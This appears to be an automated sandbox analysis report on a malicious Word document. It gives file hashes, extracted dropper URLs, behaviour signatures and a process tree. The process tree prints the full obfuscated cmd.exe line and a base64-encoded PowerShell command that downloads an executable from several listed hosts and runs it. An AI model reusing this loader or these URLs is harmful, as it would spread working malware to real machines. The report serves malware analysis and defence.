Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    29-04-2024 13:58

General

  • Target

    07d3be8c4df887e034194eb0b16c963e_JaffaCakes118.doc

  • Size

    90KB

  • MD5

    07d3be8c4df887e034194eb0b16c963e

  • SHA1

    73aabccc3811c97c64505a3ad45377e0e8a99965

  • SHA256

    aa9766333f3c909aef146b12b0b2302f9c898ef949f4e731cb21eb236d6a3793

  • SHA512

    009fb5fb473679f7f486e7dd65b6a4b717f3166d2979fe74b469a9e41b9415c605fb93addc4ddcc95ea3d8ed33fa386ad00b8746bb5e291fc8e77cc3450c2d14

  • SSDEEP

    1536:tptJlmrJpmxlRw99NBf+aHE+y134L/Ojsn/orH/Dz:zte2dw99fzy1IL/csQrH/

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://lunamarialovelife.com/BGbuRaCy

exe.dropper

http://scotthagar.com/wQf4xNY

exe.dropper

http://vjencanjazagreb.hr/GsRrp

exe.dropper

http://challengerballtournament.com/tZH0dI

exe.dropper

http://xn--12cbq4codld5bxbqy5hych1ap4b0a4mugg.tk/jEKcM

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\07d3be8c4df887e034194eb0b16c963e_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2112
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2748
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /v^:^ ^ ^ /r " s^E^t ^ ^ ^5^t^2=^=^AA^IAAC^AgA^A^IA^ACA^gA^A^IA^ACA^g^A^AIAACA^g^AA^I^AAC^Ag^AA^IA^AC^A^9BQfAs^H^A^oB^w^Y^AQ^H^A^h^B^w^Y^A^0H^A^7Awa^A^E^GAlBgcA^I^GA^7^A^Q^bAc^FAVBAJ^AACA^t^BQ^ZA^QH^AJBQ^LAUG^ArB^w^bAYH^AuBQ^S^As^DApA^Q^b^Ac^FAVB^AJAAC^AsAgWAs^EAW^B^A^J^AgCAl^B^A^b^A^k^GA^GB^A^Z^A^EGAvB^A^bA^4G^A3B^w^bA^Q^E^AuA^QW^Ag^GA^h^B^A^J^A^s^HA^5^B^gcAQHA^7^B^QK^AY^HAk^B^gSA^QC^Ag^Agb^AkG^A^g^A^g^WA^sEA^W^B^AJ^AgC^AoB^w^YA^E^G^Al^B^gc^A^8GAm^B^wO^AcCAl^B^AeAU^GAuA^wJA^sCAM^B^QaA^8^EA^k^A^wKAcCAcB^wJAsC^Aj^B^Qa^A^w^G^A^iBQ^d^A^AH^A6A^gdA4GAlBA^JA0^D^AtBwVAU^F^A^kAwO^AcC^A^5A^QNAIDAn^A^AIA0^D^AgA^AT^A^k^GA^PBA^J^A^sDA^pAwJ^A^AE^AnA^A^K^AQHA^p^BAb^AAHA^T^BgLAcC^AN^B^w^Y^A^s^EAFBga^A8CAr^BAd^A^4CAn^B^wZA^UHAt^BANA^EGAwA^g^Y^A^QDA^wBQYAED^A^oBwYA^kHAo^B^QN^A^k^H^Ax^B^gY^AgHA^i^B^QN^AQG^AsB^A^ZA^8GA^jB^AN^A^E^H^A^iB^wYAIDA^x^AQLA0CA^u^B^Ae^A8C^AvAg^OA^AHA^0^BAd^A^gG^A^AB^QSA^Q^GA^wAA^S^A^oFA0B^wL^A^0^G^Av^Bw^YA4CA0Bg^b^AU^G^A^t^B^QYA^4^GAy^B^Qd^A^8^G^A0BAb^Aw^GA^hB^gYAIH^A^l^Bw^ZA^4GA^lB^AbAwGA^hB^A^a^AM^GAvAwLA^oDA^w^BA^dA^Q^HAoBAQ^A^AH^Ay^B^gUAM^HAH^Bw^L^AI^H^A^o^BgL^AI^GA^l^B^gc^AcG^A^h^B^g^e^A^E^GA^q^Bgb^A^E^G^A^j^B^gbAUG^AqB^gd^A^8C^AvAgO^A^A^HA0^BAdAgGAAB^Q^W^A4^EA^4B^AN^A^YG^AR^B^wdA^8C^A^tBwb^A^MGA^u^AgcA^EGAnB^QYA^g^GA^0^B^AdA8G^AjBwcA^8CAv^A^gO^AA^H^A^0^BA^d^A^g^GA^AB^QeAM^E^A^hB^gUA^U^H^A^iB^wR^AI^EAv^A^Q^bA^8^GAj^Bg^L^A^U^G^Am^BQaAw^G^A^lB^gd^A^8GAsBQ^YA^kG^Ay^BQYA0^GAhBgbAUHA^s^B^wL^A8C^A6^A^Ac^A^Q^HA0^B^Aa^AcCA^9^Ag^dAQG^A^K^BA^J^A^sDA0B^gbAUG^A^p^B^AbA^M^EAi^BQ^Z^AcF^A^uAAdAUGAO^B^AIA^Q^H^AjBQZ^A^o^G^Ai^B^wb^A^0CA^3^BQZA^4^GA9^A^Q^WAgG^Ah^BA^J ^e-^ ^l^le^h^sr^ew^op& ^F^or /^l %^7 iN ( ^ 10^73 -^1^ ^ 0) ^do ^s^et ^iR=!^iR!!^5^t^2:~ %^7, 1!&&^I^f %^7 ^e^Q^u ^0 C^a^l^L %^iR:^*^iR^!^=% "
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2368
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -e JABhAGgAWQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABKAGQAdgA9ACcAaAB0AHQAcAA6AC8ALwBsAHUAbgBhAG0AYQByAGkAYQBsAG8AdgBlAGwAaQBmAGUALgBjAG8AbQAvAEIARwBiAHUAUgBhAEMAeQBAAGgAdAB0AHAAOgAvAC8AcwBjAG8AdAB0AGgAYQBnAGEAcgAuAGMAbwBtAC8AdwBRAGYANAB4AE4AWQBAAGgAdAB0AHAAOgAvAC8AdgBqAGUAbgBjAGEAbgBqAGEAegBhAGcAcgBlAGIALgBoAHIALwBHAHMAUgByAHAAQABoAHQAdABwADoALwAvAGMAaABhAGwAbABlAG4AZwBlAHIAYgBhAGwAbAB0AG8AdQByAG4AYQBtAGUAbgB0AC4AYwBvAG0ALwB0AFoASAAwAGQASQBAAGgAdAB0AHAAOgAvAC8AeABuAC0ALQAxADIAYwBiAHEANABjAG8AZABsAGQANQBiAHgAYgBxAHkANQBoAHkAYwBoADEAYQBwADQAYgAwAGEANABtAHUAZwBnAC4AdABrAC8AagBFAEsAYwBNACcALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABPAGkATAAgAD0AIAAnADIANQA5ACcAOwAkAFUAVwBtAD0AJABlAG4AdgA6AHAAdQBiAGwAaQBjACsAJwBcACcAKwAkAE8AaQBMACsAJwAuAGUAeABlACcAOwBmAG8AcgBlAGEAYwBoACgAJABWAEsAWgAgAGkAbgAgACQASgBkAHYAKQB7AHQAcgB5AHsAJABhAGgAWQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABWAEsAWgAsACAAJABVAFcAbQApADsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABVAFcAbQA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsAfQB9ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA=
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2768

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      3726f0273ac8237d60b7555de719e655

      SHA1

      7906163dc629b2ad37d2db8c9e9c87fe31653e32

      SHA256

      59d072708477cb32ef223662f198338046c683f5ab9d1f679d78a0245422b713

      SHA512

      b56f6cae2054654eb7c39a273e2685435d90ff9527bdd04d66daab7b4c06b37303f505fbf3e7154df570c335874f4bc0d205430d406e53372d2142768db19ded

    • memory/2112-40-0x0000000006210000-0x0000000006310000-memory.dmp

      Filesize

      1024KB

    • memory/2112-2-0x000000007141D000-0x0000000071428000-memory.dmp

      Filesize

      44KB

    • memory/2112-43-0x0000000006210000-0x0000000006310000-memory.dmp

      Filesize

      1024KB

    • memory/2112-42-0x0000000006210000-0x0000000006310000-memory.dmp

      Filesize

      1024KB

    • memory/2112-41-0x0000000006210000-0x0000000006310000-memory.dmp

      Filesize

      1024KB

    • memory/2112-0-0x000000002F161000-0x000000002F162000-memory.dmp

      Filesize

      4KB

    • memory/2112-39-0x0000000006210000-0x0000000006310000-memory.dmp

      Filesize

      1024KB

    • memory/2112-38-0x0000000006210000-0x0000000006310000-memory.dmp

      Filesize

      1024KB

    • memory/2112-51-0x000000007141D000-0x0000000071428000-memory.dmp

      Filesize

      44KB

    • memory/2112-52-0x0000000006210000-0x0000000006310000-memory.dmp

      Filesize

      1024KB

    • memory/2112-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2112-67-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2112-68-0x000000007141D000-0x0000000071428000-memory.dmp

      Filesize

      44KB